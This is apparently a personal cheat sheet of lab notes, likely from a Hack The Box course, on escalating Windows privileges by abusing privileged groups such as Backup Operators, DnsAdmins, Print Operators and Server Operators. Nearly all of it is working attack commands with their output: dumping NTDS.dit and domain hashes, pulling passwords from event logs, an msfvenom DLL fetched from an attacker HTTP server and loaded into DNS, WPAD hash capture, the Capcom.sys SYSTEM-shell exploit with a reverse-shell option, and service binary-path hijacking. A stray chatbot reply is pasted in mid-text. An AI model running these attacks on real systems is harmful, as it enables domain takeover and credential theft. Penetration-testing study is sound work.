Group Privileges
Current User Privileges
PS C:\mrci0x1> whoami /privPrivilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system DisabledGroup Membership
PS C:\mrci0x1> whoami /groupsGroup Name Type SID
BUILTIN\Backup Operators Alias S-1-5-32-551Privileged Groups & Their Dangerous Privileges
Administrators
Full administrative control over systems or domain.
All high privileges: SeBackupPrivilege, SeRestorePrivilege, SeDebugPrivilege, SeTakeOwnershipPrivilege, SeImpersonatePrivilege, SeLoadDriverPrivilege, SeSecurityPrivilege, SeRemoteInteractiveLogonRight, SeNetworkLogonRight
Complete system or domain takeover.
Server Operators
Can manage services, shares, and backups on servers.
SeBackupPrivilege, SeRestorePrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege
Allows service manipulation, file access, backup abuse, and lateral movement.
Backup Operators
Can access system files, registries, and backups on DCs.
SeBackupPrivilege, SeRestorePrivilege, SeTakeOwnershipPrivilege
Equivalent to Domain Admin due to credential dumping capability (SAM/NTDS).
Print Operators
Can load drivers and access DC consoles.
SeLoadDriverPrivilege
Driver-based privilege escalation via malicious drivers.
Hyper-V Administrators
Controls virtual Domain Controllers.
Full virtualization control (indirect access to all privileges of DC VMs).
Full control over AD virtual infrastructure; can compromise DC VMs directly.
Account Operators
Can modify user/group accounts (non-protected).
May indirectly gain SeImpersonatePrivilege by account manipulation.
Allows creation of privileged accounts for escalation.
Remote Desktop Users
Allowed to log in via RDP.
SeRemoteInteractiveLogonRight
Facilitates lateral movement; privileged RDP sessions can allow privilege abuse.
Remote Management Users
Can log in via PowerShell Remoting.
SeRemoteInteractiveLogonRight + often indirectly use SeImpersonatePrivilege
Enables remote command execution; abuse possible if privileged tokens exist.
Group Policy Creator Owners
Can create Group Policy Objects (GPOs).
Indirectly allows privilege abuse by backdooring policies to assign SeDebugPrivilege, SeImpersonatePrivilege, etc.
Backdooring via GPO to gain SYSTEM or domain-wide control.
Schema Admins
Can modify Active Directory schema.
Indirect full control over AD by modifying ACLs and schema objects.
Persistent full AD control and long-term escalation paths.
DNS Admins
Can configure DNS settings and load DLLs.
Indirect privilege abuse (e.g., DLL injection)
Persistence and escalation via DLL loading on DCs or DNS abuse (WPAD attacks).
Groups Attacks
Backup Operators Group
1. Check Group Membership
PS C:\mrci0x1> whoami /groupsGroup Name Type SID
BUILTIN\Backup Operators Alias S-1-5-32-5512. Check Available Privileges
PS C:\mrci0x1> whoami /privPRIVILEGE NAME DESCRIPTION STATE
SeMachineAccountPrivilege Add workstations to domain Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled3. Load SeBackupPrivilege Modules to enable SeBackupPrivilege privilage
PS C:\mrci0x1> Import-Module .\SeBackupPrivilegeUtils.dll
PS C:\mrci0x1> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS C:\htb> Get-SeBackupPrivilegeSeBackupPrivilege is disabledPS C:\htb> Set-SeBackupPrivilege
PS C:\htb> Get-SeBackupPrivilegeSeBackupPrivilege is enabled4. Confirm Privileges After Enabling
PS C:\mrci0x1> whoami /privPrivilege Name Description State
============================= ============================== ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Disabled5. List Target Directory Contents
PS C:\mrci0x1> dir C:\Confidential\Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/6/2021 1:01 PM 88 2021 Contract.txt6. Attempt Direct Access to Protected File
PS C:\mrci0x1> Get-Content 'C:\Confidential\2021 Contract.txt'cat : Access to the path 'C:\Confidential\2021 Contract.txt' is denied.
At line:1 char:1
+ cat 'C:\Confidential\2021 Contract.txt'
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : PermissionDenied: (C:\Confidential\2021 Contract.txt:String) [Get-Content], Unauthor
izedAccessException
+ FullyQualifiedErrorId : GetContentReaderUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetContentCommand7. Copy Protected File with SeBackupPrivilege
PS C:\mrci0x1> Copy-FileSeBackupPrivilege 'C:\Confidential\2021 Contract.txt' .\Contract.txtCopied 88 bytes8. Read Copied Protected File
PS C:\mrci0x1> cat .\Contract.txt9. Start DiskShadow to Create Shadow Copy
PS C:\mrci0x1> diskshadow.exeMicrosoft DiskShadow version 1.0Inside diskshadow:
DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\Windows\Temp\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit10. List Files from Shadow Copy
PS C:\mrci0x1> dir E:\ Directory: E:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/6/2021 1:00 PM Confidential
d----- 9/15/2018 12:19 AM PerfLogs
d-r--- 3/24/2021 6:20 PM Program Files
d----- 9/15/2018 2:06 AM Program Files (x86)
d----- 5/6/2021 1:05 PM Tools
d-r--- 5/6/2021 12:51 PM Users
d----- 3/24/2021 6:38 PM Windows11. Copy NTDS.dit from Shadow Copy
PS C:\mrci0x1> Copy-FileSeBackupPrivilege E:\Windows\NTDS\ntds.dit C:\Tools\ntds.ditCopied 16777216 bytes12. Save SYSTEM Hive
C:\mrci0x1> reg save HKLM\SYSTEM SYSTEM.SAVThe operation completed successfully.13. Save SAM Hive
C:\mrci0x1> reg save HKLM\SAM SAM.SAVThe operation completed successfully.14. Load DSInternals Module & Extract BootKey & Extract Administrator Hash (DSInternals)
PS C:\htb> Import-Module .\DSInternals.psd1
PS C:\htb> $key = Get-BootKey -SystemHivePath .\SYSTEM
PS C:\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\ntds.dit -BootKey $keySecrets
NTHash: cf3a5525ee9414229e66279623ed5c58
NTLMStrongHash: 7790d8406b55c380f98b92bb2fdc63a7
AES256 Key: 5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad4315. Extract All Hashes with secretsdump.py
mrci0x1@htb$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCALImpacket v0.9.23.dev1+20210504.123629.24a0ae6f - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0xc0a9116f907bd37afaaa845cb87d0550
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 85541c20c346e3198a3ae2c09df7f330
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WINLPE-DC01$:1000:aad3b435b51404eeaad3b435b51404ee:7abf052dcef31f6305f1d4c84dfa7484:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a05824b8c279f2eb31495a012473d129:::
htb-student:1103:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::16. Alternative: Copy NTDS.dit via Robocopy
C:\mrci0x1> robocopy /B E:\Windows\NTDS .\ntds ntds.dit-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Thursday, May 6, 2021 1:11:47 PM
Source : E:\Windows\NTDS\
Dest : C:\Tools\ntds\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
New Dir 1 E:\Windows\NTDS\
100% New File 16.0 m ntds.dit
Event Log Readers Group
1. Check Event Log Readers Group Membership
C:\mrci0x1> net localgroup "Event Log Readers"Alias name Event Log Readers
Comment Members of this group can read event logs from local machine
Members
-------------------------------------------------------------------------------
logger
The command completed successfully2. Query Security Logs Using wevtutil (Local)
PS C:\mrci0x1> wevtutil qe Security /rd:true /f:text | Select-String "/user"Process Command Line: net use T: \\fs01\backups /user:tim MyStr0ngP@ssword Query Security Logs Using wevtutil (Remote With Alternate Credentials)
C:\mrci0x1> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"Process Command Line: net use T: \\fs01\backups /user:tim MyStr0ngP@sswordQuery Event ID 4688 Using Get-WinEvent (Admin Required)
(Admin Required)PS C:\mrci0x1> Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}CommandLine
-----------
net use T: \\fs01\backups /user:tim MyStr0ngP@sswordQuery Get-WinEvent With Alternate Credentials
PS C:\mrci0x1> $cred = Get-Credential
PS C:\mrci0x1> Get-WinEvent -LogName Security -Credential $cred | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}CommandLine
-----------
net use T: \\fs01\backups /user:tim MyStr0ngP@ssword3. Check PowerShell Operational Log
PS C:\mrci0x1> Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 104. Check Application Log for Credentials
PS C:\mrci0x1> wevtutil qe Application /rd:true /f:text | Select-String "password"DnsAdmins Groups
A. Attack on DnsAdmins Group by DLL Injection
1. Check Membership in DnsAdmins Group
PS C:\mrci0x1> Get-ADGroupMember -Identity DnsAdminsdistinguishedName : CN=netadm,CN=Users,DC=INLANEFREIGHT,DC=LOCAL
name : netadm
objectClass : user
objectGUID : 1a1ac159-f364-4805-a4bb-7153051a8c14
SamAccountName : netadm
SID : S-1-5-21-669053619-2741956077-1013132368-11092. Generate Malicious DLL
mrci0x1@htb[/htb]$ msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 313 bytes
Final size of dll file: 5120 bytes
Saved as: adduser.dll3. Host DLL via HTTP
mrci0x1@htb[/htb]$ python3 -m http.server 77774. Download DLL on Domain Controller
PS C:\mrci0x1> wget "http://10.10.14.4:7777/adduser.dll" -outfile "adduser.dll"5. Load DLL via dnscmd
C:\mrci0x1> dnscmd.exe /config /serverlevelplugindll C:\Users\netadm\Desktop\adduser.dllRegistry property serverlevelplugindll successfully reset.
Command completed successfully.6. Verify DNS Service Permissions
C:\mrci0x1> wmic useraccount where name="netadm" get sidSID
S-1-5-21-669053619-2741956077-1013132368-1109C:\mrci0x1> sc.exe sdshow DNSD:(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;RPWP;;;S-1-5-21-669053619-2741956077-1013132368-1109)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7. Stop DNS Service
C:\mrci0x1> sc stop dnsSERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x75308. Start DNS Service
C:\mrci0x1> sc start dnsSERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 69609. Verify Domain Admin Membership
C:\mrci0x1> net group "Domain Admins" /domGroup name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator netadm
The command completed successfully10. Spawn Elevated Session
C:\mrci0x1> runas /user:INLANEFREIGHT\netadm cmdso the attack on DnsAdmins group by DLL injection and get joind to Domain Admins Group
B. Attack on DnsAdmins by Creating WPAD Record attack
1. Disable Global Query Block List
C:\mrci0x1> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.localRemoves WPAD from the block list, enabling the attack.
2. Add WPAD DNS Record
C:\mrci0x1> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.33. Start Responder for Hash Capture
sudo responder -I eth0 -wf4. Crack Captured Hashes
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt5. Verify Malicious DLL in Registry
C:\mrci0x1> reg query \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\ParametersHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters
GlobalQueryBlockList REG_MULTI_SZ wpad\0isatap
EnableGlobalQueryBlockList REG_DWORD 0x1
PreviousLocalHostname REG_SZ WINLPE-DC01.INLANEFREIGHT.LOCAL
Forwarders REG_MULTI_SZ 1.1.1.1\08.8.8.8
ForwardingTimeout REG_DWORD 0x3
IsSlave REG_DWORD 0x0
BootMethod REG_DWORD 0x3
AdminConfigured REG_DWORD 0x1
ServerLevelPluginDll REG_SZ adduser.dll6. Delete DLL Registry Entry
C:\mrci0x1> reg delete \\10.129.43.9\HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters /v ServerLevelPluginDllDelete the registry value ServerLevelPluginDll (Yes/No)? Y
The operation completed successfully.7. Restart DNS Service After Cleanup
C:\mrci0x1> sc start dns8. Verify DNS Service Running
C:\mrci0x1> sc query dnsSERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 4984
FLAGS :9. Remove WPAD Record and Re-enable Block List
Remove-DnsServerResourceRecord -ZoneName transglobal.local -RRType A -Name wpad -ComputerName dc01.transglobal.local
Set-DnsServerGlobalQueryBlockList -Enable $true -ComputerName dc01.transglobal.localHyper-V Administrators
If Domain Controllers have been virtualized, then the virtualization admins should be considered Domain Admins
If the operating system is vulnerable to CVE-2018-0952 or CVE-2019-0841, we can leverage this to gain SYSTEM privileges. Otherwise, we can try to take advantage of an application on the server that has installed a service running in the context of SYSTEM, which is startable by unprivileged users,
For exemple Firefox: https://raw.githubusercontent.com/decoder-it/Hyper-V-admin-EOP/master/hyperv-eop.ps1
After running the PowerShell script, we should have full control of this file and can take ownership of it.
C:\mrci0x1> takeown /F C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeNext, we can replace this file with a malicious maintenanceservice.exe, start the maintenance service, and get command execution as SYSTEM.
C:\mrci0x1> sc.exe start MozillaMaintenancePrint Operators Group
1. Check Current Privileges
PS C:\mrci0x1> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
======================== ================================= =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeShutdownPrivilege Shut down the system DisabledBypass UAC (optional if required)
PS C:\mrci0x1> runas /user:INLANEFREIGHT\printsvc cmd2. Check Privileges Again
PS C:\mrci0x1> whoami /privPRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ================================== ==========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled3. Compile EnableSeLoadDriverPrivilege
PS C:\mrci0x1> cl /DUNICODE /D_UNICODE EnableSeLoadDriverPrivilege.cppMicrosoft (R) C/C++ Optimizing Compiler Version 19.28.29913 for x86
Copyright (C) Microsoft Corporation. All rights reserved.
EnableSeLoadDriverPrivilege.cpp
Microsoft (R) Incremental Linker Version 14.28.29913.0
Copyright (C) Microsoft Corporation. All rights reserved.
/out:EnableSeLoadDriverPrivilege.exe
EnableSeLoadDriverPrivilege.obj4. Add Registry Key for Capcom.sys
PS C:\mrci0x1> reg add HKCU\System\CurrentControlSet\CAPCOM /v ImagePath /t REG_SZ /d "\??\C:\Tools\Capcom.sys"The operation completed successfully.PS C:\mrci0x1> reg add HKCU\System\CurrentControlSet\CAPCOM /v Type /t REG_DWORD /d 1The operation completed successfully.5. Verify Driver Status (before load)
PS C:\mrci0x1> .\DriverView.exe /stext drivers.txt
PS C:\mrci0x1> cat drivers.txt | Select-String -pattern Capcom6. Enable SeLoadDriverPrivilege
PS C:\mrci0x1> EnableSeLoadDriverPrivilege.exewhoami:
INLANEFREIGHT0\printsvc
whoami /priv
SeMachineAccountPrivilege Disabled
SeLoadDriverPrivilege Enabled
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege Enabled by default
SeIncreaseWorkingSetPrivilege Disabled
NTSTATUS: 00000000, WinError: 07. Verify SeLoadDriverPrivilege Enabled
PS C:\mrci0x1> whoami /privPrivilege Name Description State
============================= ================================== ==========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled8. Verify Capcom.sys Loaded
PS C:\mrci0x1> .\DriverView.exe /stext drivers.txt
PS C:\mrci0x1> cat drivers.txt | Select-String -pattern CapcomDriver Name : Capcom.sys
Filename : C:\Tools\Capcom.sys9. Execute ExploitCapcom
PS C:\mrci0x1> .\ExploitCapcom.exe[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 0000024822A50008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launchedModify for Reverse Shell (optional)
optional)TCHAR CommandLine[] = TEXT("C:\\ProgramData\\revshell.exe");Automate with EoPLoadDriver
PS C:\mrci0x1> EoPLoadDriver.exe System\CurrentControlSet\Capcom C:\Tools\Capcom.sys[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-454284637-3659702366-2958135535-1103\System\CurrentControlSet\Capcom
NTSTATUS: c000010e, WinError: 0Then Execute ExploitCapcom
PS C:\mrci0x1> .\ExploitCapcom.exe[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000070
[*] Shellcode was placed at 0000024822A50008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launchedCleanup Registry Key
PS C:\mrci0x1> reg delete HKCU\System\CurrentControlSet\CapcomExcellent. Here’s your clean format exactly like previous ones — commands + output only, fully organized:
Server Operators Group
The AppReadiness service runs as LocalSystem, a highly privileged account.
Query AppReadiness Service
C:\mrci0x1> sc qc AppReadiness[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AppReadiness
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Windows\System32\svchost.exe -k AppReadiness -p
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : App Readiness
DEPENDENCIES :
SERVICE_START_NAME : LocalSystemCheck Service Permissions
C:\mrci0x1> c:\Tools\PsService.exe security AppReadinessPsService v2.25 - Service information and configuration utility
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com
SERVICE_NAME: AppReadiness
DISPLAY_NAME: App Readiness
ACCOUNT: LocalSystem
SECURITY:
[ALLOW] NT AUTHORITY\SYSTEM
Query status
Query Config
Interrogate
Enumerate Dependents
Pause/Resume
Start
Stop
User-Defined Control
Read Permissions
[ALLOW] BUILTIN\Administrators
All
[ALLOW] NT AUTHORITY\INTERACTIVE
Query status
Query Config
Interrogate
Enumerate Dependents
User-Defined Control
Read Permissions
[ALLOW] NT AUTHORITY\SERVICE
Query status
Query Config
Interrogate
Enumerate Dependents
User-Defined Control
Read Permissions
[ALLOW] BUILTIN\Server Operators
AllVerify Local Administrators Group Membership
C:\mrci0x1> net localgroup AdministratorsAlias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
The command completed successfully.Modify Service Binary Path
C:\mrci0x1> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"[SC] ChangeServiceConfig SUCCESSStart the Service (Trigger Payload)
C:\mrci0x1> sc start AppReadiness[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.Verify Updated Administrators Group Membership
C:\mrci0x1> net localgroup AdministratorsAlias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
server_adm
The command completed successfully.Verify Admin Access with crackmapexec
mrci0x1@htb$ crackmapexec smb 10.129.43.9 -u server_adm -p 'HTB_@cademy_stdnt!'SMB 10.129.43.9 445 WINLPE-DC01 [*] Windows 10.0 Build 17763 (name:WINLPE-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB 10.129.43.9 445 WINLPE-DC01 [+] INLANEFREIGHT.LOCAL\server_adm:HTB_@cademy_stdnt! (Pwn3d!)Dump Administrator NTLM Hash with secretsdump
mrci0x1@htb$ secretsdump.py server_adm@10.129.43.9 -just-dc-user administratorImpacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation
Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:5db9c9ada113804443a8aeb64f500cd3e9670348719ce1436bcc95d1d93dad43
Administrator:aes128-cts-hmac-sha1-96:94c300d0e47775b407f2496a5cca1a0a
Administrator:des-cbc-md5:d60dfbbf20548938
[*] Cleaning up...Last updated